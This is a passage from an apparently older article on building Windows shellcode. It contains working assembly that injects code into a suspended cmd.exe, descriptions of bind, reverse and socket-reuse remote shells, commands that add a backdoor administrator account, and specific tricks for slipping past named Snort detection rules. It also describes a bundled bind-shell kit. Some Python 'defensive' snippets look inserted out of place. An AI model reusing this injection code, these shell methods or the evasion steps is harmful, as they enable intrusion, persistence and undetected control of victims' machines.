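Adding the module base to this RVA gives the address of IMAGE_EXPORT_DIRECTORY, whose AddressOfFunctions, AddressOfNames and AddressOfNameOrdinals fields start at offset 1Ch.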
Migrating to Another Process
After a vulnerable service is attacked, chances are that the system becomes
unstable; it may crash and make the user notice suspicious activity, the attack may
even bring down the whole system altogether, or, in the worst-case scenario, one of
the attacked service's threads may generate an error and terminate unexpectedly,
leaving our shellcode orphaned. Alternatively, anti-virus or IDS systems may detect
the attack, and a crash dump may be left on the system with our tracks in memory. To
avoid these problems, the shellcode must immediately migrate into another process,
safely connect back to the attacker and allow him to explore the system further
interactively. Windows has no equivalent of process forking as found in Unix or
Linux. LSD proposed a method for process forking, but I could not get it to work, so I
forged ahead with my own.
To migrate into the memory space of another process, we first create an
arbitrary process using CreateProcess() (my choice is cmd.exe) in suspended mode, so
it does not start running until we signal it. Next we allocate enough memory inside the
suspended process using VirtualAllocEx(), copy the shellcode into the allocated
memory with WriteProcessMemory(), and finally create a remote thread inside it using
CreateRemoteThread(); note that the thread's start address must be set to the base
address of the allocated memory. This is a very robust, safe and flexible method of
moving into another process.
pFork proc
local pPI[15]:BYTE ; 16 bytes, process info structure
local pSI[16]:DWORD ; 68 bytes, startup info structure
local Base:DWORD
jmp tFork
align 4
dFork:
db "Remote Shell by NiTro",0
db "cmd",0
tFork:
mov ecx,16
.REPEAT
mov pSI[ecx],0 ; Zero out the structure
.UNTILCXZ
mov eax,offset dFork
mov pSI[0],68
;cb, size of structure
mov pSI[0+3*4],eax ;lpTitle
lea eax,pPI[0]
push eax
;lpProcessInformation
lea eax,pSI[0]
push eax
;lpStartupInfo
push 0
;lpCurrentDirectory=NULL
push 0
;lpEnvironment=NULL
push 4h
;dwCreationFlags=CREATE_SUSPENDED
push 0
;bInheritHandles=FALSE
push 0
;lpThreadAttributes=NULL
push 0
;lpProcessAttributes=NULL
mov eax,offset dFork+22
; Offset of "cmd"
push eax
;lpCommandLine="cmd"
push 0
;lpApplicationName=NULL
call LocateKernel
mov ecx,0B87742CBh
;Hash of CreateProcessA
call GetProcAdd
;Find location of CreateProcessA in kernel32
call esi
;Invoke CreateProcessA
push 40h
;PAGE_EXECUTE_READWRITE
push 1000h
;MEM_COMMIT
push 5000h
;20kb
push 0
;Start at address zero(means do not care)
lea eax,pPI[0]
;hProcess(By value)
push [eax]
call LocateKernel
mov ecx,0E9D81A3Bh
;Hash of VirtualAllocEx
call GetProcAdd
;Find location of VirtualAllocEx in kernel32
call esi
;Allocate memory in the new process
mov Base,eax
;ebx=base address of the allocated region of pages
mov ecx,offset pDummy
; Base address of our shellcode to be moved into new process
push 0
push 800h
;Write 2k memory
push ecx
;lpBuffer
push eax
;lpBaseAddress, base address indicated by VirtualAllocEx
lea eax,pPI[0]
push [eax]
;hProcess(By value)
call LocateKernel
mov ecx,0A6A6793Dh
;Hash of WriteProcessMemory
call GetProcAdd
;Find location of WriteProcessMemory in kernel32
call esi
;Write memory in the new process
lea edi,pPI[4]
push [edi]
;hThread(By value)
call LocateKernel
mov ecx,0195D7906h
;Hash of ResumeThread
call GetProcAdd
;Find location of ResumeThread in kernel32
;call esi
;Invoke ResumeThread
push 0
;lpThreadId
push 4h
;dwCreationFlags=CREATE_SUSPENDED
push 0
;lpParameter
push Base
;lpStartAddress
push 800h
;dwStackSize
push 0
;lpThreadAttributes
lea eax,pPI[0]
push [eax]
;hProcess(By value)
call LocateKernel
mov ecx,07231F46Ch
;Hash of CreateRemoteThread
call GetProcAdd
call esi
push eax
;Push hThread on stack
call LocateKernel
mov ecx,0195D7906h
;Hash of ResumeThread
call GetProcAdd
;Find location of ResumeThread in kernel32
call esi
;Invoke ResumeThread
ret
pFork endp
Spawning Shell
Now comes the salient part: spawning a shell, which makes the attacker's day. The
attacker wants to work on a shell remotely and interactively and do his dirty work on
the victim's box. To accomplish this we use the CreateProcess() function to execute an
instance of the command interpreter with its standard input, output, and error
redirected to anonymous pipes (created with CreatePipe()), and we transmit data between
the attacker and the shell over sockets. In this mechanism we perform a blocking read
on the socket, write the received data to the stdin of cmd for processing, call Sleep()
to give cmd time to execute the command, and then call PeekNamedPipe(), which does not
block, to check whether any data is waiting on stdout or stderr. If there is, we send
the result back to the attacker over the socket. The shellcode then goes back to
waiting for data on the socket. Unfortunately, any data that arrives at stdout or
stderr during this wait is not read until the next command from the attacker arrives
on the socket.
There is, however, a better solution that does not have this disadvantage. Here a
direct handle to the network socket (created using WSASocket()) is used instead of
anonymous pipes. The command interpreter reads from and writes to the socket directly
while the shellcode waits for it to terminate using WaitForSingleObject(). Yet this
method has a disadvantage of its own: if the command interpreter hangs, the shellcode
blocks indefinitely and the attacker has practically no way to re-establish the
connection with the victim. LSD proposed a much more complex, but more elegant and
prudent, synchronization method for this problem. In Microsoft Windows,
WaitForMultipleObjects() is used to synchronize on objects. The function waits for any
of several objects to be signaled and reports which object caused the wake-up. It can
handle change notifications, console input, events, jobs, mutexes, semaphores,
processes, threads, and waitable timers. Evidently this function does not allow direct
monitoring of sockets or of the output of console applications. That can, however, be
achieved with event objects. The only way to associate an event with a pipe handle is
to use overlapped mode. To do this, we create an event with the CreateEvent() function
and pass its handle, in the OVERLAPPED structure, to the ReadFile() operation. This
allows the calling process to resume execution without blocking; while the operation
is pending, wait functions report the event as non-signaled. When the operation
finishes, the application can get its result with the GetOverlappedResult() function.
For this procedure we must use named pipes instead of anonymous pipes, because
anonymous pipes do not support overlapped I/O. Synchronization with socket objects can
be accomplished using the WSACreateEvent() function. The socket is associated with the
event object by calling WSAEventSelect(); notice that this function puts the socket
into non-blocking mode. After this, the event handle can be used as input for
WaitForMultipleObjects(). When this function alerts us, we can use
WSAEnumNetworkEvents() to discover which of our desired events occurred. To set the
socket back to blocking mode, WSAEventSelect() must first be called with no events
selected, and then ioctlsocket() must be called.
Network Communications
Every shellcode must eventually interact with the attacker, letting him execute
commands on the victim’s box. On Microsoft Windows, applications use the Winsock API
to interface with network protocols and communicate with the other party. To
initialize the Winsock library one must first call the WSAStartup() function, which
initiates use of ws2_32.dll in the process. The shellcode can then communicate in one
of three ways. The first is to create a socket, bind it to a port, listen for an
incoming connection, and accept it, which yields a newly created socket. With this
method the attacker connects to a known port on the victim’s machine and communicates
with the shellcode through it. It is also very convenient for creating multiple
connections to the shellcode. The downside is that sometimes this has no chance of
working. Chances are the server is protected by corporate firewalls and tight security
configurations that only allow connections through port 80 (http). In the rare case of
a vulnerability in the www server itself, the firewall still does not allow outbound
connections on ports other than a few well-known ports that are already in use, even
after the security hole has been exploited successfully. The only solution in this
case is to learn the specific firewall settings and use the permitted ports for the
attack.
In the second scenario, the shellcode creates a backward connection to the external
system from which the attack was initiated. The shellcode does not need to bind to a
port and wait; instead it periodically tries to connect to the attacker’s machine on
the port from which the attack was conducted.
The third scenario was devised by LSD. In this method the shellcode walks through the
process handle table and searches for the socket handle of the remote TCP endpoint
identified by the given source port. The getpeername() function is used to get
information about the other side of the connection, namely its IP address and port
number. The information found is then reused to communicate with the attacker. Note
that this method leaves no further trace on the compromised system’s IDS or firewall.
Even if a port is already in use, you can bind to it by setting the SO_REUSEADDR flag
with a call to the setsockopt() function. If the process that uses the port has set
the SO_EXCLUSIVEADDRUSE option on it, this method fails. Phrack, however, suggested
terminating the process that owns the port and taking the port over entirely. To
terminate the process forcefully, the TerminateProcess() function is called. This
function needs a handle to the process, but our shellcode resides in the address space
of the same vulnerable service, so ending the service means the end of our shellcode.
This is where process forking shows its importance: we jettison the shellcode out of
the vulnerable process and, before running it, terminate the service by passing -1,
the handle to the current process, to the TerminateProcess() function. If needed, we
can restart the vulnerable service by a variety of methods. For example, if it is IIS
we can use a Task Scheduler command like “at <time> iisreset”; if it is the SQL
service we can use “net start sqlserveragent”; and so forth.
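Seen from the defending side, the SO_EXCLUSIVEADDRUSE behavior mentioned above can be
sketched in a few lines of Python. This is only an illustration under stated
assumptions: bind_exclusive is a hypothetical helper name, and Python's socket module
exposes SO_EXCLUSIVEADDRUSE only on Windows, so the sketch falls back to a plain bind
on other platforms.

```python
import socket


def bind_exclusive(host="127.0.0.1", port=0):
    """Bind a listening TCP socket, requesting exclusive use of the port.

    Hypothetical helper for illustration. On Windows the option asks the
    stack to refuse other sockets that try to share the port through
    SO_REUSEADDR. On other platforms the constant is absent and the
    socket is bound normally.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    exclusive = getattr(socket, "SO_EXCLUSIVEADDRUSE", None)
    if exclusive is not None:
        # Must be set before bind() to take effect.
        srv.setsockopt(socket.SOL_SOCKET, exclusive, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv
```

A service that binds this way does not share its port with a later socket that merely
sets SO_REUSEADDR, which is why the text above falls back to terminating the owning
process.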
All said and done, you can always feed cmd command-line options that execute the
desired actions on the compromised system, after which the shellcode can die. For
example, the following commands create a new user on the vulnerable system and make
it an administrator:
cmd /c net user /add compaquser compaqpass
cmd /c net localgroup /add administrators compaquser
Once a connection with the attacker is established, he can even upload files to or
download files from the victim’s machine. This is a necessary part of a full
penetration test. The attacker can thereby install backdoors to maintain access to the
machine or steal sensitive information from it. File transfer is easily performed by
opening a file with CreateFile() and then either reading data from the socket and
writing it to the file with WriteFile(), or reading the file with ReadFile() and
writing the data to the socket.
Avoiding IDS Detection!
Snort is a free, yet formidable, IDS tool with thousands of rules for detecting
possible attacks. It works by examining captured packets; whenever a packet meets a
rule's criteria, Snort takes the configured action. Every time cmd is started, it
displays:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\...>
Snort rule number 2123 captures this banner. We can easily suppress it by using
“cmd /k”.
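To make the detection side concrete, here is a minimal Python sketch of how a
content-matching signature can recognize the banner shown above. The byte patterns are
assumptions modeled on that banner, not the text of the actual Snort rule, and
matches_banner is a hypothetical name.

```python
# Hypothetical patterns modeled on the cmd banner quoted in the text.
# They are NOT copied from any real Snort rule.
BANNER_PATTERNS = (
    b"Microsoft Windows",
    b"(C) Copyright 1985-",
    b"Microsoft Corp.",
)


def matches_banner(payload: bytes) -> bool:
    """Return True when every pattern occurs in the payload, in order."""
    pos = 0
    for pattern in BANNER_PATTERNS:
        idx = payload.find(pattern, pos)
        if idx < 0:
            return False
        # Continue searching after the end of the current match.
        pos = idx + len(pattern)
    return True
```

A packet payload that carries the banner text matches, while ordinary command output
without it does not.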
There is also another rule (6622) that captures the directory listing produced by
“dir”; if a match is hit, it triggers an alert.
dir
Volume in drive C is Cool
Volume Serial Number is SKSK-6622
To avoid this we can use the “/b” switch with the dir command. It is best to use the
following command so that the option stays in effect for the rest of the session:
Set dircmd=/b
Snort also has a signature that detects "Command completed". This string is usually
generated by the "net" command. It is easy to create a wrapper for the net command
that does not display the "Command completed" status, or to use other tools such as
"nbtdump".
What goodies are along with this article!
In this section we talk about the package that accompanies this article. As a proof of
concept I have included MOD.asm, the assembly source that contains the core functions
of the shellcode. It is able to decode itself, fork itself, shut down the parent
process, start the socket functions in the new process, bind to a port and wait for a
connection, and spawn a shell. After a successful connection has been made to port
4660 of the victim’s machine, the attacker is given a shell that executes commands and
lets him upload or download files on the server. Use Nitro.exe to establish this
connection with the victim’s box; it is enough to specify the IP address of the
victim’s computer. To show how a real exploit may be used against a vulnerable
application I have also included Smash.exe, which has a vulnerable function: when it
is exploited by stuffing more data onto the stack than the buffer holds, it crashes
and the shellcode gets a chance to run. You may perform all these tests on your own
machine. First run Smash.exe and press any key to crash it; it does all this
internally. Afterward the shellcode is in memory waiting for a connection on port
4660. Use Nitro.exe to connect to your own machine (127.0.0.1) and try the shellcode!
MOD.asm can be assembled using MASM from www.masm32.com. The result is an executable
called MOD.exe; notice that it cannot run independently. To extract the actual code of
this executable, that is, without the unneeded sections of the COFF file, I have
written a program called AsmTools.exe that extracts the .text section of PE files. To
use it, open MOD.exe by pressing the “Extract OpCode” button, which copies the
contents of the file to the clipboard. On the next tab, Encode, check “encode
shellcode”; this automatically encodes the appropriate parts of the assembly code. On
the last tab, Section, press “Extract Sections” and then “Put on clipboard”; this puts
the extracted opcodes in hexadecimal on the clipboard, ready to be placed in your C++
programs! The generated hex codes often end with a series of identical characters;
please remove them from the shellcode, as they are extraneous. AsmTools also has a
button that calculates the simple hash of any given function name; all the shellcode
uses those hashes to find the appropriate function calls.
All source code for all programs accompanies this article; you can peruse it carefully
before you execute anything unwittingly.
Closing
Shellcode has proved fatal in terms of both full system compromise and overall
computer takeover. We have shown how this unmitigated disaster can lead to total
penetration of a system. Work on shellcode is still under way, and many
security-minded people have jumped on the bandwagon of this type of attack. While
vendors must take measures to protect their proprietary software from damage, this
seems to be a futile effort, seeing that such errors are hard to spot and all too
often go unnoticed by programmers. The open source movement may alleviate this problem
to some extent, but it still does not stop hackers from pushing ahead with their
findings.
Microsoft, as a giant, has done a lot to rescue its reputation from the status quo. To
that end it has introduced new technologies to fight buffer overflow errors in
Windows. In Windows 2003 it introduced BOPT (Buffer Overflow Prevention Technology),
and in Windows XP SP2 it embedded DEP (Data Execution Prevention). BOPT works in a
similar fashion to commercial security tools such as Entercept (now NAI Entercept) and
Okena (now Cisco Security Agent). All of them rely on stack back-tracing and do not
really create non-executable stack or heap segments. They hook some OS-level API
calls, traverse the stack frames, and verify that the return address belongs to a
memory-mapped file and not to an anonymous part of memory, or they verify that the
return address immediately follows a jump or call instruction. Because such a tool
does not hook all versions of a particular function, and does not check deeply or
thoroughly enough, it has a slew of shortcomings that allow the stack-trace mechanism
to be evaded and buffer overruns to succeed again.
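The return-address check described above can be modeled in a few lines of Python. This
is a simplified sketch, not the logic of any of the named products: the Module type,
the function names, and the address ranges used with it are all hypothetical.

```python
from typing import NamedTuple, Optional, Sequence


class Module(NamedTuple):
    """A memory-mapped image (hypothetical record for illustration)."""
    name: str
    base: int
    size: int


def owning_module(addr: int, modules: Sequence[Module]) -> Optional[Module]:
    """Return the module whose address range contains addr, if any."""
    for mod in modules:
        if mod.base <= addr < mod.base + mod.size:
            return mod
    return None


def return_address_is_plausible(addr: int, modules: Sequence[Module]) -> bool:
    """Accept a return address only if it lies inside a mapped image.

    Addresses on the stack or heap belong to no module and are rejected.
    """
    return owning_module(addr, modules) is not None
```

With a module list covering an executable and a system DLL, an address inside the DLL
passes the check, while an address in the stack region fails it. The model also shows
the limit noted in the text: the check only runs where a hook calls it.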
Data execution prevention (DEP) is a set of hardware and software technologies that
perform additional checks on memory to help protect against malicious code exploits.
In Windows XP SP2, DEP is enforced by both hardware and software. Hardware-enforced
DEP marks all memory locations in a process as non-executable unless the location
explicitly contains executable code. DEP helps prevent buffer overflow attacks by
intercepting them and raising an exception. Both Advanced Micro Devices™ (AMD) and
Intel® Corporation have defined and shipped Windows-compatible architectures that are
compatible with DEP. An additional set of data execution prevention security checks
has been added to Windows XP SP2. These checks, known as software-enforced DEP, are
designed to mitigate exploits of exception handling mechanisms in Windows.
Software-enforced DEP runs on any processor that is capable of running Windows XP SP2.
By default, software-enforced DEP only protects limited system binaries, regardless of
the hardware-enforced DEP capabilities of the processor.
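As a toy model of the hardware-enforced check, the following Python sketch treats
memory as a list of pages with an executable flag and raises an exception when an
instruction fetch targets a page without it. Everything here is an assumption made for
illustration (the tuple layout, the names, the addresses); real DEP is enforced by the
processor and the operating system, not by application code.

```python
class AccessViolation(Exception):
    """Stand-in for the exception raised on a blocked instruction fetch."""


def check_execute(addr, pages):
    """Allow an instruction fetch only from a page marked executable.

    pages is a hypothetical list of (start, size, executable) tuples.
    """
    for start, size, executable in pages:
        if start <= addr < start + size:
            if not executable:
                raise AccessViolation("execute from data page at %#x" % addr)
            return True
    raise AccessViolation("unmapped address %#x" % addr)
```

A fetch from a code page succeeds, while a fetch from a stack page marked as data
raises the exception, which mirrors the behavior the paragraph above describes.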
While the battle between good and evil goes on unremittingly, I hope to have presented
a brief account of state-of-the-art methods that have existed for quite a while.
Thanks for spending your time reading.
References
[1] The Last Stage of Delirium Research Group (LSD), Windows Assembly
Components
http://lsd-pl.net/papers.html.
[2] Microsoft Corporation. Microsoft Developer Network Library
http://msdn.microsoft.com/library/
[3] Phrack Magazine, History and Advances in Windows Shellcode
http://www.Phrack.org/show.php?p=62&a=7
[4] Phrack Magazine, Bypassing 3rd Party Windows Buffer Overflow Protection
http://www.Phrack.org/show.php?p=62&a=5
[5] Phrack Magazine, Smashing The Stack For Fun And Profit
http://www.Phrack.org/show.php?p=49&a=14
[6] Phrack Magazine, Win32 Buffer Overflows (Location, Exploitation and
Prevention)
http://www.Phrack.org/show.php?p=55&a=15
[7] Phrack Magazine, The Frame Pointer Overwrite
http://www.Phrack.org/show.php?p=55&a=8
[8] MSDN Magazine, Feb. 2002, “An In-Depth Look into the Win32 Portable
Executable File Format” by Matt Pietrek
[9] MSDN Magazine, Mar. 1994, “Peering Inside the PE: A Tour of the Win32
Portable Executable File Format” by Matt Pietrek
[10] Under the Hood, May 1996, Microsoft Systems Journal (MSJ), “TIB (Thread
Information Block) in the buff” by Matt Pietrek
[11] Under the Hood, Jan 1997, Microsoft Systems Journal (MSJ), SEH “A Crash
Course on the Depths of Win32™ Structured Exception Handling” by Matt Pietrek
[12] Under the Hood, Jan 2001, Microsoft Systems Journal (MSJ), “IA-64 Registers”
by Matt Pietrek
[13] The Undocumented Functions, by Tomasz Nowak
http://undocumented.ntinternals.net.
[14] Microsoft Tech Net, “Changes to Functionality in Microsoft Windows XP
Service Pack 2”, part 3, Memory Protection Technologies
http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/default.mspx
[15] CodeGuru, “Three Ways to Inject Your Code into another Process” by Robert
Kuster.
http://www.codeguru.com/Cpp/W-P/system/processesmodules/
[16] The Code Project, “API Monitoring Unleashed” by Parag Paithankar
http://www.codeproject.com/system/api_monitoring_unleashed/
[17] Snort, The Open Source Network Intrusion Detection System
www.Snort.org
[18] Metasploit Framework, complete environment for writing, testing, and using
exploit code, www.metasploit.com
[19] Google the Oracle!
www.Google.com